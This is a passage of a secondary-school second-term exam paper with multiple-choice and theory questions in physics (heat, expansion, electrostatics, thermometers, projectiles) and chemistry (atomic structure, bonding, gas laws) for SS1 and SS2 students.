very well written paper (with a few exception, above) which flows well and is readily understood.\n- Simple idea, but effective. Novel to my knowledge.\n\nCons\n==\n- The application might be of interest to a limited portion of the NIPS community\n\nNice paper, needs a little clarification in places before publication but otherwise good.\n\nSubmitted by Assigned_Reviewer_5\n\nQ1: Comments to author(s). First provide a summary of the paper, and then address the following criteria: Quality, clarity, originality and significance. (For detailed reviewing guidelines, see http://nips.cc/PaperInformation/ReviewerInstructions)\nThis paper discusses GP regression for the multi-task case, and specifically whether one should allow correlations between tasks in the noise/residuals. It shows that such correlations can be dealt with efficiently, basically by rotating in task space so that one gets back to uncorrelated noise. Applications to biological problems with low-rank/factor-analysis type task correlations show improvements over the uncorrelated noise case.\nPresentation is good but confusing in parts - e.g. in Sec 3 an Omega suddenly appears which up to there was an identity matrix, presumably to allow correlations in noise across data points? Motivation for this seems unclear. \"ln\" missing in first line of (7)? (d,d') on p1 should be called (t,t') for consistency with notation later. The GP-KP and GP-KS acronyms are easy to mix up and the authors themselves get muddled (they also have GS-KP and GS-KS).\nNice paper on allowing correlated (between tasks) noise in multi-task GP regression, dealt with efficiently by \"rotating away\" these correlations. Applications to biological data seem convincing.\n\nSubmitted by Assigned_Reviewer_7\n\nQ1: Comments to author(s). First provide a summary of the paper, and then address the following criteria: Quality, clarity, originality and significance. (For detailed reviewing guidelines, see http://nips.cc/PaperInformation/ReviewerInstructions)\nIn this work, efficient inference is presented for multi-task GPs having different signal and noise structure (inter-task covariance).\n\nThis work is well-written and organized. Its main contribution is to emphasize the importance of noise in multi-task GP prediction: When noise and signal have the same inter-task covariance, or noise is not present, a multi-task GP produces the same mean posterior as independent GPs. This had been mentioned before in , but not emphasized enough.\n\nEfficient inference for the \"useful\" case in which both structures are different is provided. This is rather straightforward given existing literature on the topic.\n\nThe paper could be improved by:\n\n- Providing a reasonable example in which the \"useful\" case arises naturally. An attempt at this is made when talking about \"unobserved causal features\". First, I would like to point out that the word \"causal\" might be unfortunate here. The reasoning applies equally as long as the feature is a useful input for prediction, no matter whether it is a cause, a consequence, or none. Second, the explanation about how Y_hidden is generated is missing. If it was generated just as Y_obs is generated, it would have the same structure. The authors imply that this is not the case, but it would be interesting to mention a natural process with such behavior.\n\n- Giving more detail about why (7) is a more efficient version. Matrices that require inversion have the same size, some readers might not be familiar with the properties of Kronecker products of diagonal matrices.\n\n- The equation inside the second paragraph of Sec. 2.2 using vec(Y) is dimensionally inconsistent.\n\n- Omega seems to be used in Sec. 3 as a placeholder for the previously homoscedastic noise, but this is not explained.\n\n- If tasks turn out to be independent, this model restricts them all to have the same signal power (according to the proposed diagonal plus rank one matrix). This might be unrealistic.\nThis work emphasizes the influence of noise structure in making multi-task GPs useful. Derivations are quite straightforward but result in a useful model, which is a variation of previously existing multi-task GPs (noise and signal have different inter-task covariances).\nAuthor Feedback\n\nQ1:Author rebuttal: Please respond to any concerns raised in the reviews. There are no constraints on how you want to argue your case, except for the fact that your text should be limited to a maximum of 6000 characters. Note however that reviewers and area chairs are very busy and may not read long vague rebuttals. It is in your own interest to be concise and to the point.\nAll Reviewers:\nWe thank all reviewers for pointing out that the definition of Omega is missing. In Section 3, we show how efficient inference can be done for an arbitrary sum of two kronecker products, while the application to multi task prediction is mainly concerned with the special case Omega=I_{NN}. We will clarify that in the final submission.\n\nFollowing up the suggestions of Reviewer 2 and 4, we will also provide a more comprehensive derivation of the equations in the Appendix.\n\nReviewer 1:\nHow the parameter sigma in line 246 was set.\n-All hyperparameters, including sigma, were obtained by gradient-based optimization of the marginal likelihood.\n\nIn the experiments regarding the prediction of gene expression in yeast, it looks like the preprocessing and filtering of the dataset does favor the proposed method (which may have problems with identifiability) as genes with low signal and low noise are discarded.\n-In our experiments, we followed the design choice of [1,6] and employed a common noise level sigma for all tasks. However, it is possible to consider one noise level for each task, which would be appropriate for larger number of tasks with variable signal-to-noise ratio.\n\nIn particular, interpreting the results in Figure 3 is a bit misleading as it seems that their method has high levels of unidentifiability.\n-It is true that our method, as other multitask approaches, is susceptible to local optima. To mitigate the effect of local optima for both prediction and interpretation, we used multiple random restarts and selected the solution with the best out-of-sample likelihood, as described in the Section 4.\nFor the yeast dataset in particular, we repeated the training 10 times, and computed the mean latent factors and its standard errors: 0.2103+/- 0.0088 (averaged over all latent factors, over the ten best runs selected by out-of-sample likelihood). Moreover, the observed differences were too small to detect by eye. Thus, we believe that our interpretation is valid.\n\nMulti-task settings usually compare to a single GP for all tasks (i.e. pool GP).\n-We ran pool GP on the Arabidopsis data, however the method was outperformed by all other competitors with ease (Flowering: 0.0512, Life cycle:0.1051, Maturation:0.0466, Reproduction:0.0488). We would also like to note that both Kronecker models have the pool GP in the space of possible solutions (X_c,X_sigma-->0).\n\nSec 2.2 is obvious and should be omitted. The case C = \\Sigma leads to C \\otimes (R+I), which is the same proof shown in previous work .\n-We agree that the proof in Section 2.2 can be shortened. However, as also pointed out by Reviewer 2, we found the insight that multitask learning cancels when C=\\Sigma noteworthy.\n\nWe will improve the notation and correct the details as suggested. We will add a more careful comparison to and add recent results from the geostatistics literature (Zhang 2007).\nReviewer 2\nI like the approach through Bonilla and Williams' result. I wonder if you could expand this slightly: why does the prediction reduce to independent models?\nIn the noiseless scenario, the GP mean prediction has the following form:\nM*_{n,t}=kron(C,R*)kron(C,R)^(-1)vec(Y)=kron(C,R*)kron(C^(-1),R^(-1))vec(Y)=kron(C*C^(-1),R* * R^(-1))vec(Y) = kron(I,R* * R)vec(Y), and is thus independent of C (see ).\n\nIt would be good to know why K_tilde is easier to deal with than K. Is it smaller or is the Kronecker of the identity easy to deal with?\n-We exploit the fact that [\\kron(C,R) + I]^{-1}=[\\kron(U_C,U_R)^T (\\kron(S_C,S_R)+I)+\\kron(U_C,_UR)]^{-1}=\n\\kron(U_C,U_R)^T(\\kron(S_C,S_R) + I)^{-1}\\kron(U_C,_UR), where (\\kron(S_C,S_R)+I) is diagonal.\n\nline 360. How are the conditions organised in the covariance matrices of fig 3? I guess one condition is the first block of the matrix, and the other condition is the next block?\n-The covariance matrices are between the different tasks, while the different conditions are between the samples.\nWe obtained the ordering by hierarchical clustering between the phenotypes. One can observe that a) rank-1 approximations are sufficient to capture the main trends of the empirical covariance matrix and b) signal and noise covariance matrices reflect different processes, illustrating the benefits from structured noise. We will clarify the description.\nReviewer 3:\nWe will refine the notation as suggested.\nReviewer 4:\nCausality vs. Predictability\n-We fully agree with the author that a feature need not to be causal for being predictive and will generalize the description of the simulations to account for that. The simulation by itself does not depend on the assumption that the generated features are causal.\n\nThe explanation about how Y_hidden is generated is missing. If it was generated just as Y_obs is generated, it would have the same structure.\n-We used different rescalings for Y_hidden (r_hidden) and Y_obs (r_obs) to obtain different task-task covariance matrices (C=r_obs*r_obs^T, \\Sigma=r_hidden*r_hidden^T).\n\nThe authors imply that this is not the case, but it would be interesting to mention a natural process with such behavior.\n-In microarray experiments, gene expression levels are often influenced by genetic factors (observed process) and confounding factors such as batch effects (unobserved process). We mention these examples of natural processes in the final submission.\n\nThe equation inside the second paragraph of Sec. 2.2 using vec(Y) is dimensionally inconsistent.\n-The equation should be N log|1/N Y^T(R+I)^(-1)Y|.\n\nIf tasks turn out to be independent, this model restricts them all to have the same signal power.\n-In principle one could introduce a separate noise variance for each target dimension. We chose to use a single noise variance sigma over all tasks as done in [1,6] and many other multitask approaches. However, our efficient inference scheme would also apply to instances with variable noise levels." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.908914,"math_prob":0.8456523,"size":20094,"snap":"2023-40-2023-50","text_gpt3_token_len":4661,"char_repetition_ratio":0.110701844,"word_repetition_ratio":0.1770471,"special_character_ratio":0.21474072,"punctuation_ratio":0.10927064,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9684467,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T18:38:50Z\",\"WARC-Record-ID\":\"<urn:uuid:31544158-e198-4557-a90b-b47c31b1ea79>\",\"Content-Length\":\"31060\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:534458ac-0ed7-4868-bb92-5b86dfa12d2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:019b9480-5a71-4678-a374-0781c50d1569>\",\"WARC-IP-Address\":\"198.202.70.94\",\"WARC-Target-URI\":\"https://proceedings.neurips.cc/paper_files/paper/2013/file/59c33016884a62116be975a9bb8257e3-Reviews.html\",\"WARC-Payload-Digest\":\"sha1:BN6APK3UJW3SCKVBCZJAB25SL7DYJDYJ\",\"WARC-Block-Digest\":\"sha1:QR2ACCDROJRFEZZHPQL57RMWWHHP7CD5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511170.92_warc_CC-MAIN-20231003160453-20231003190453-00812.warc.gz\"}"}
https://jzus.zju.edu.cn/article.php?doi=10.1631/FITEE.1601101
[ "Full Text:", null, "<1350>\n\nSummary:", null, "<1313>\n\nCLC number: TP13\n\nOn-line Access: 2017-12-04\n\nRevision Accepted: 2016-10-15\n\nCrosschecked: 2017-11-01\n\nCited: 0\n\nClicked: 4158\n\nCitations:  Bibtex RefMan EndNote GB/T7714", null, "ORCID:\n\nXue-song Chen\n\nhttp://orcid.org/0000-0001-9530-0644\n\n### -   Go to\n\nArticle info.\n Frontiers of Information Technology & Electronic Engineering  2017 Vol.18 No.10 P.1479-1487 http://doi.org/10.1631/FITEE.1601101", null, "Galerkin approximation with Legendre polynomials for a continuous-time nonlinear optimal control problem\n\n Author(s):  Xue-song Chen Affiliation(s):  School of Applied Mathematics, Guangdong University of Technology, Guangzhou 510006, China Corresponding email(s):   [email protected] Key Words:  Generalized Hamilton-Jacobi-Bellman equation, Nonlinear optimal control, Galerkin approximation, Legendre polynomials Share this article to: More <<< Previous Article|Next Article >>>\n\nXue-song Chen. Galerkin approximation with Legendre polynomials for a continuous-time nonlinear optimal control problem[J]. Frontiers of Information Technology & Electronic Engineering, 2017, 18(10): 1479-1487.\n\n@article{title=\"Galerkin approximation with Legendre polynomials for a continuous-time nonlinear optimal control problem\",\nauthor=\"Xue-song Chen\",\njournal=\"Frontiers of Information Technology & Electronic Engineering\",\nvolume=\"18\",\nnumber=\"10\",\npages=\"1479-1487\",\nyear=\"2017\",\npublisher=\"Zhejiang University Press & Springer\",\ndoi=\"10.1631/FITEE.1601101\"\n}\n\n%0 Journal Article\n%T Galerkin approximation with Legendre polynomials for a continuous-time nonlinear optimal control problem\n%A Xue-song Chen\n%J Frontiers of Information Technology & Electronic Engineering\n%V 18\n%N 10\n%P 1479-1487\n%@ 2095-9184\n%D 2017\n%I Zhejiang University Press & Springer\n%DOI 10.1631/FITEE.1601101\n\nTY - JOUR\nT1 - Galerkin approximation with Legendre polynomials for a continuous-time nonlinear optimal control problem\nA1 - Xue-song Chen\nJ0 - Frontiers of Information Technology & Electronic Engineering\nVL - 18\nIS - 10\nSP - 1479\nEP - 1487\n%@ 2095-9184\nY1 - 2017\nPB - Zhejiang University Press & Springer\nER -\nDOI - 10.1631/FITEE.1601101\n\nAbstract:\nWe investigate the use of an approximation method for obtaining near-optimal solutions to a kind of nonlinear continuous-time (CT) system. The approach derived from the galerkin approximation is used to solve the generalized Hamilton-Jacobi-Bellman (GHJB) equations. The galerkin approximation with legendre polynomials (GALP) for GHJB equations has not been applied to nonlinear CT systems. The proposed GALP method solves the GHJB equations in CT systems on some well-defined region of attraction. The integrals that need to be computed are much fewer due to the orthogonal properties of legendre polynomials, which is a significant advantage of this approach. The stabilization and convergence properties with regard to the iterative variable have been proved. Numerical examples show that the update control laws converge to the optimal control for nonlinear CT systems.\n\n### Reference\n\nAguilar, C.O., Krener, A.J., 2014. Numerical solutions to the Bellman equation of optimal control. J. Optim. Theory Appl., 160(2):527-552.", null, "Bardi, M., Capuzzo-Dolcetta, I., 1997. Optimal Control and Viscosity Solutions of Hamilton-Jacobi-Bellman Equations. Birkhäuser Boston, Inc., Boston, MA (with appendices by Maurizio Falcone and Pierpaolo Soravia).", null, "Beard, R.W., Saridis, G.N., Wen, J.T., 1996. Improving the performance of stabilizing controls for nonlinear systems. IEEE Contr. Syst. Mag., 16(5):27-35.", null, "Beard, R.W., Saridis, G.N., Wen, J.T., 1997. Galerkin approximations of the generalized Hamilton-Jacobi-Bellman equation. Automatica, 33(12):2159-2177.", null, "Bellman, R., 1957. Dynamic Programming. Princeton University Press, New Jersey, USA.\n\nCacace, S., Cristiani, E., Falcone, M., et al., 2012. A patchy dynamic programming scheme for a class of Hamilton-Jacobi-Bellman equations. SIAM J. Sci. Comput., 34(5):A2625-A2649.", null, "Canuto, C., Hussaini, M.Y., Quarteroni, A., et al., 1988. Spectral Methods in Fluid Dynamics. Springer-Verlag, New York, USA.\n\nGong, Q., Kang, W., Ross, I.M., 2006. A pseudospectral method for the optimal control of constrained feedback linearizable systems. IEEE Trans. Autom. Contr., 51(7):1115-1129.", null, "Govindarajan, N., de Visser, C.C., Krishnakumar, K., 2014. A sparse collocation method for solving time-dependent HJB equations using multivariate B-splines. Automatica, 50(9):2234-2244.", null, "Isidori, A., 2013. Nonlinear Control Systems. Springer Science & Business Media.\n\nKirk, D.E., 2012. Optimal Control Theory: an Introduction. Courier Corporation.\n\nKleinman, D., 1968. On an iterative technique for Riccati equation computations. IEEE Trans. Autom. Contr., 13(1):114-115.", null, "Lews, F., Syrmos, V., 1995. Optimal Control. Wiley, New Jersey, USA.\n\nLuo, B., Wu, H.N., Huang, T., et al., 2014. Data-based approximate policy iteration for affine nonlinear continuous-time optimal control design. Automatica, 50(12):3281-3290.", null, "Luo, B., Huang, T., Wu, H.N., et al., 2015a. Data-driven Hinfty control for nonlinear distributed parameter systems. IEEE Trans. Neur. Netw. Learn. Syst., 26(11):2949-2961.", null, "Luo, B., Wu, H.N., Huang, T., 2015b. Off-policy reinforcement learning for Hinfty control design. IEEE Trans. Cybern., 45(1):65-76.", null, "Luo, B., Wu, H.N., Li, H.X., 2015c. Adaptive optimal control of highly dissipative nonlinear spatially distributed processes with neuro-dynamic programming. IEEE Trans. Neur. Netw. Learn. Syst., 26(4):684-696.", null, "Markman, J., Katz, I.N., 2000. An iterative algorithm for solving Hamilton-Jacobi type equations. SIAM J. Sci. Comput., 22(1):312-329.", null, "Sakamoto, N., van der Schaft, A.J., 2008. Analytical approximation methods for the stabilizing solution of the Hamilton-Jacobi equation. IEEE Trans. Autom. Contr., 53(10):2335-2350.", null, "Saridis, G.N., Lee, C.S.G., 1979. An approximation theory of optimal control for trainable manipulators. IEEE Trans. Syst. Man Cybern., 9(3):152-159.", null, "Smears, I., Süli, E., 2014. Discontinuous Galerkin finite element approximation of Hamilton-Jacobi-Bellman equations with Cordes coefficients. SIAM J. Numer. Anal., 52(2):993-1016.", null, "Wu, H.N., Luo, B., 2012. Neural network based online simultaneous policy update algorithm for solving the HJI equation in nonlinear control. IEEE Trans. Neur. Netw. Learn. Syst., 23(12):1884-1895.", null, "Yu, J., Jiang, Z.P., 2015. Global adaptive dynamic programming for continuous-time nonlinear systems. IEEE Trans. Autom. Contr., 60(11):2917-2929.", null, "", null, "" ]
[ null, "https://jzus.zju.edu.cn/images/pdf_logo.png", null, "https://jzus.zju.edu.cn/images/ppt_logo.png", null, "https://jzus.zju.edu.cn/images/orcid.png", null, "https://jzus.zju.edu.cn/images/crossmark_button.png", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/images/crossref.bmp", null, "https://jzus.zju.edu.cn/auimg.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57663494,"math_prob":0.7051646,"size":5993,"snap":"2022-27-2022-33","text_gpt3_token_len":1755,"char_repetition_ratio":0.13023877,"word_repetition_ratio":0.08010336,"special_character_ratio":0.31136325,"punctuation_ratio":0.2949695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9596953,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-25T19:06:51Z\",\"WARC-Record-ID\":\"<urn:uuid:529fcaca-ac52-4d66-9377-fc79fa9a210a>\",\"Content-Length\":\"55362\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:db2b73e5-dd29-4eb9-8ae3-fafd56b68de9>\",\"WARC-Concurrent-To\":\"<urn:uuid:fcad7e64-733a-45a3-a9a1-a525a4485fc9>\",\"WARC-IP-Address\":\"210.32.15.20\",\"WARC-Target-URI\":\"https://jzus.zju.edu.cn/article.php?doi=10.1631/FITEE.1601101\",\"WARC-Payload-Digest\":\"sha1:I5BAS3NNCRL5NZJ4SPS3NXYXKZJNB2O7\",\"WARC-Block-Digest\":\"sha1:CRJRFHYZDRNVITVVHKA4XTS4OF5WA3OW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103036099.6_warc_CC-MAIN-20220625190306-20220625220306-00001.warc.gz\"}"}
https://classbasic.com/second-term-examination-physics-and-chemistry-for-ss-1-ss-3-term-2-exam-questions/
[ "# Second Term Examination Physics and Chemistry for SS 1 – SS 3 Term 2 Exam Questions\n\n### CHEMISTRY AND PHYSICS\n\nSECOND TERM EXAMINATION\n\nSS 1 – SS 3 EXAM QUESTIONS\n\nScroll down for SS 2 – SS 3 exam questions.\n\n### SSS 1 PHYSICAL\n\nSECTION A\n\nInstruction: Fill the gaps with the most suitable word from the options A – D.\n\n1. The weight of a body is measured with ________.\n\n(a) Spring balance\n\n(b) Beam balance\n\n(c) Lever\n\n(d) Chemical balance\n\n2. Which instrument is best for measuring small quantity of liquid?\n\n(a) Burette\n\n(b) Pipette\n\n(c) Cylinder\n\n(d) Beaker\n\n3. Which of the following is not correct?\n\nThe SI unit of:\n\n(a) Acceleration is ms-²\n\n(b) Momentum is Ns\n\n(c) Work is joule\n\n(d) Energy is watt\n\n4. What is the dimension of force?\n\n(a) LT-1\n\n(b) LT-2\n\n(c) MLT-1\n\n(d) ML-3\n\n5. The heat from the sun reaches the earth mainly by the process of:\n\n(a) Conduction\n\n(c) Convection\n\n(d) Reflection\n\nSecond Term Examination Physics SS 2 – Exam Questions\n\n6. In which of the following is the molecules of water moving fastest?\n\n(a) Steam\n\n(b) Ice\n\n(c) Ice – Steam mixture\n\n(d) Water\n\n7. Calculate the Linear Expansivity of brass of length 120m, that assumes a new length of 120.05m, when heated through a temperature of 100ºC.\n\n(a) 0.42 x 10-5K-1\n\n(b) 0.6 x 10-4K-1\n\n(c) 0.52 x 10-5K-1\n\n(d) 0.44 x 10-4K-1\n\n8. Using the Linear Expansivity calculated from question 3 above, determine the increase in volume of a brass container, with original volume (V1) equals 100m3, if heated through a temperature of 50oC.\n\n9. Which of the following surfaces is the best absorber of radiant energy?\n\n(a) White\n\n(b) Black\n\n(c) Red\n\n(d) Yellow\n\n10. All of these except one are applications of expansion in metals.\n\n(a) Temperature control in laundry iron.\n\n(b) Bimetallic strip Thermometer.\n\n(c) Compensated balance wheel of a watch.\n\n(d) Sagging of telegraph wires.\n\n11. Circulation of fresh air in a room is as a result of?\n\n(b) Convection\n\n(c) Conduction\n\n(d) Expansion\n\n12. In Order to charge an electroscope by induction, the following processes can be followed:\n\nI. Bring charge near the electroscope.\n\nII. Touch the cap.\n\nIII. Remove the charge.\n\nIV. Remove the finger.\n\n(a) I – II – III – IV\n\n(b) I – II – IV – III\n\n(c) II – I – IV – III\n\n(d) I – IV – II – III\n\n13. Which of the following can be used to compare the magnitude of the charges on two given bodies?\n\n(a) Glass Rod\n\n(b) Gold – Leaf Electroscope\n\n(c) Ammeter\n\n(d) Capacitor\n\n14. Which of the following rods acquire positive charge?\n\nI. Polythene rubbed with silk.\n\nII. Cellulose Acetate Rubbed with silk.\n\nIII. Glass rod rubbed with silk.\n\n(a) II only\n\n(b) I only\n\n(c) I, II and III\n\n(d) II and III only\n\n15. The micrometer screw gauge is used for measuring ________.\n\nSECTION B — THEORY\n\nAnswer any 2 questions in this section.\n\nQUESTION 1\n\na. Differentiate between Heat and Temperature\n\nb. List 5 effects of heat on matter.\n\nc. List 5 kinetic molecular theory you know.\n\nd. What is Thermal expansion of solid?\n\ne. List 3 effects of expansion on everday’s life .\n\nf. List 2 applications of expansion and explain any 1 .\n\nQUESTION 2\n\na. Define Linear expansivity of solids .\n\nb. The linear expansivity of a material is 15 x 10-5k — 1. If the initial area is 25m2,\n\ncalculate:\n\ni. The increase in area if it is heated through 40ºC .\n\nii. Cubic expansivity.\n\nc – i. State three (3) modes of transfer of heat.\n\nc – ii. Describe each and explain their application in everyday life\n\nQUESTION 3\n\na. Explain the term ‘Anomalous Expansion of water’\n\nb. What materials are regarded as poor conductors? List 5 .\n\nc. What are some applications of poor conductors?\n\nQUESTION 4\n\na. Explain comprehensively ‘The gold-leaf Electroscope’\n\nb. Explain the Process by which a lightning conductor works.\n\n### SSS 1 CHEMISTRY\n\nSECTION A\n\nInstruction: Fill the gaps with the most suitable word from the options A – D.\n\n1. Which of the following does not support the phenomenon of Kinetic Theory.\n\n(a) Brownian Motion\n\n(b) Diffusion\n\n(c) Osmosis\n\n(d) Linear Expansivity\n\n2. P1V1 = P2V2 supports _________.\n\n(a) Charles’ Law\n\n(b) Boyles’ Law\n\n(c) Grahams’ Law\n\n3. One of the following is not a chemical _________.\n\n(a) Rusting\n\n(b) Sublimation of solids\n\n(c) Slaking of quicklime\n\n(d) Fermentation of glucose\n\n4. The percentage of oxygen in SO2 is _________.\n\n(a) 50%\n\n(b) 5%\n\n(c) 200%\n\n(d) 500%\n\n(S = 32, O = 16)\n\nRelevant link – Second Term Examination Chemistry SS 2\n\n5. The relative molecular mass of lead (ii) trioxonitrate (v) [PbNO3 ] is\n\n(a) 170\n\n(b) 269\n\n(c) 232\n\n(d) 132\n\n(Pb = 207, N = 14, O = 16)\n\n6. The relative molecular mass of Al2O3 is _________.\n\n(a) 102\n\n(b) 64\n\n(c) 156\n\n(d) 84\n\n(Al = 27, O = 16)\n\n7. Arrangement of ions in a regular pattern in a solid crystal is called _________.\n\n(a) Configuration\n\n(b) Atomic Structure\n\n(c) Lattice\n\n(d) Buffer\n\n8. Rare gases are stable because they _________.\n\n(a) are Monoatomic\n\n(b) are Volatile gases\n\n(c) forms ions easily\n\n(d) have duplet or octet electronic configurations in the outermost shell of the atom.\n\n9. Which element has an electronic configuration is 1S2 2S2 2P6 3S1.\n\n(a) Calcium\n\n(b) Chlorine\n\n(c) Sodium\n\n(d) Nitrogen\n\n10. Determine the maximum number of electrons that can occupy the principal energy level N of an Atom _________.\n\n(a) 18\n\n(b) 8\n\n(c) 24\n\n(d) 32\n\n11. An Element belongs to a period on the periodic table because of _________.\n\n(a) The number of electrons in its Outermost Shells\n\n(b) The Shell Number\n\n(c) The Electronic Configuration in the Azimuthal quantum number\n\n(d) the size of the Atom\n\n12. Which of the three states of matter has no fixed shape, no fixed volume and least dense?\n\n(a) Liquid\n\n(b) Gas\n\n(c) Solid\n\n(d) Crystal\n\n13. The escape of molecules with more than the Average Kinetic energy of the molecule is called _________.\n\n(a) Melting\n\n(b) Freezing\n\n(c) Evaporation\n\n(d) Efflorescence\n\n14. Water exists as a solid, liquid and gas respectively because water:\n\n(a) Is Colorless\n\n(b) Is Electrovalent\n\n(c) In any state possesses a certain degree of motion in the molecules.\n\n(d) Is Molecular\n\n15. The Phenomenon whereby the atmospheric pressure is equal to the Saturated vapour pressure is called _________.\n\n(a) Freezing\n\n(b) Latent Heat\n\n(c) Boiling\n\n(d) Normal Pressure\n\nSECTION B —THEORY\n\nAnswer any 3 Questions in this section.\n\nQUESTION 1\n\nBy means of Orbital Diagram, write down the Electronic Configuration of these elements –\n\nI. Sodium\n\nII. Chlorine\n\nIII. Sulphur\n\nIV. Fluorine\n\nV. Aluminium\n\nVI. Magnesium\n\nVII. Argon\n\nVIII. Phosphorus\n\nIX. Silicon\n\nX. Neon\n\nb. State the Principle that governs the filling of Electrons into Orbitals.\n\nQUESTION 2\n\na. Write briefly on the following giving an illustrated example of each of –\n\ni. Electrovalent Combination\n\nii. Covalent Combination\n\niii. Co-ordinate Covalent Combination\n\nb. List 4 difference between the compounds formed by Electrovalent bonds and Covalent Bonds.\n\nc. What are the bond types present in each of the following compounds\n\ni. Carbon(iv)Oxide\n\nii. Methane\n\niii. Calcium Oxide\n\niv. Ammonium Chloride\n\nQUESTION 3\n\na. What are Isotopes?\n\nb. Name any two element that exhibits Isotopy and give their Respective Isotopes\n\nc. Explain why the Reactive atomic Mass of chlorine is 35.5\n\nd. The Atomic Number of Sodium is 11 and its Relative atomic mass is 23:\n\nHow many protons, electrons and Neutrons are in the sodium atom?\n\nQUESTION 4\n\na. State the Kinetic theory of matter and outline 3 natural phenomenal which supports it\n\nb. State the Kinetic Theory of Gases\n\nc. Explain and State what you Understand by:\n\ni. Boyles’ Law\n\nii. Charles’ Law\n\niii. General Gas Equation\n\n### SSS 2 PHYSICS\n\nSECTION A\n\nInstruction: Fill the gaps with the most suitable word from the options A – D.\n\n1. Mercury is preferred to water as a thermometric liquid because:\n\n(a) Mercury has a lower boiling point than water\n\n(b) Mercury has uniform thermal expansion.\n\n(c) Mercury has a lower co-efficient of expansion in relating to glass than water.\n\n(d) Mercury does not wet glass.\n\n2. Thermoelectric thermometers are used in the industries because:\n\n(a) They measure very high temperature\n\n(b) Other types of thermometers are not convenient in use in industry\n\n(c) They are very responsive to temperature variations.\n\n(d) A and C only.\n\n3. Convert -10°C to °F.\n\n(a) 40°F\n\n(b) 50°F\n\n(c) 14°F\n\n(d) 28°F\n\n4. Which of the following does not increase the sensitivity of a liquid in glass thermometer?\n\n(a) A thick walled tube\n\n(b) A Capillary tube with a narrow bore\n\n(c) A thin walled tube\n\n(d) A liquid with high Expansivity\n\n5. How much heat is required to convert 20g of ice at 0oC to water at the same temperature? (S.H.C of ice = 335Jg-1\n\n(a) 1.35 x 103J\n\n(b) 5.38 x 103J\n\n(c) 6.70 x 103J\n\n(d) 7.06 x 103J\n\n6. Which of the following statement is not correct?\n\n(a) Evaporation takes place only at the surface of a liquid.\n\n(b) Boiling takes place throughout the volume of a liquid\n\n(c) Evaporation takes place at all temperatures\n\n(d) The boiling point of a liquid is not affected by impurities.\n\n7. Water in an open container boils at a lower temperature when heated of at the top of a mountain than at sea-level; Because at the top of the mountain:\n\n(a) Relative Humidity is higher than at sea level.\n\n(b) Rays of the sun adds more heat to the water.\n\n(c) Temperature is lower than at sea level.\n\n(d) Pressure is lower than at sea level.\n\n8. An Electric Current of 3A Flowing through an electric heating element of resistance 20 ohms embedded in 100g of an oil, raises the temperature of the oil by 10oC in 10 seconds, then the S.H.C. of the oil is:\n\n(a) 1.8Jg-1\n\n(b) 0.6Jg-1\n\n(c) 0.18Jg-1 oC-1\n\n(d) 1.8Jg-1oC-1\n\n9. Which of the following does not reduces the heat lost from a liquid in a Calorimeter?\n\n(a) Lagging the Calorimeter\n\n(b) Using an Insulating lid.\n\n(c) Shielding the Calorimeter from draught\n\n(d) Constantly stirring the liquid.\n\n10. Calculate the heat energy required to convert 0.500kg of ice at 0oC to ice cold water at 0oC, if the S.L.H. of fusion of ice is 3.34 x 105kg-1\n\n(a)1670 J\n\n(b) 6680 J\n\n(c) 167000 J\n\n(d) 66800 J\n\nSecond Term Examination Physics SS 1 – Exam Questions\n\n11. Mist is formed when\n\n(a) Clouds mix up.\n\n(b) Water evaporates from oceans and exposed surfaces.\n\n(c) Two warm air masses meet.\n\n(d) Air cools when its relative Humidity is close to 100%.\n\n12. Which of the following is/are correct?\n\nI. Water expands on freezing\n\nII. Ice expands on melting\n\nIII. Increased pressure lowers the melting point of ice\n\nIV. Evaporation takes place from the surface of the liquid\n\n(a) All the statements are correct\n\n(b) I and IV are correct\n\n(b) I, III, IV are correct\n\n(d) I, II and III are correct\n\n13. A body is projected vertically upward with a velocity of 10 m/s. Calculate the maximum height reached. (neglect all air resistance and assume g = 10 m/s)\n\n(a) 5m\n\n(b) 10m\n\n(c) 15m\n\n(d) 20m\n\n14. Which of the following is not correct about projectile?\n\n(a) The motion along the horizontal is constant.\n\n(b) The motion along the vertical varies.\n\n(c) It has a vertical downward acceleration.\n\n(d) The motion carries out one independent motion.\n\n15. A tennis ball is thrown with a velocity of 3m/s at an angle of 300 to the 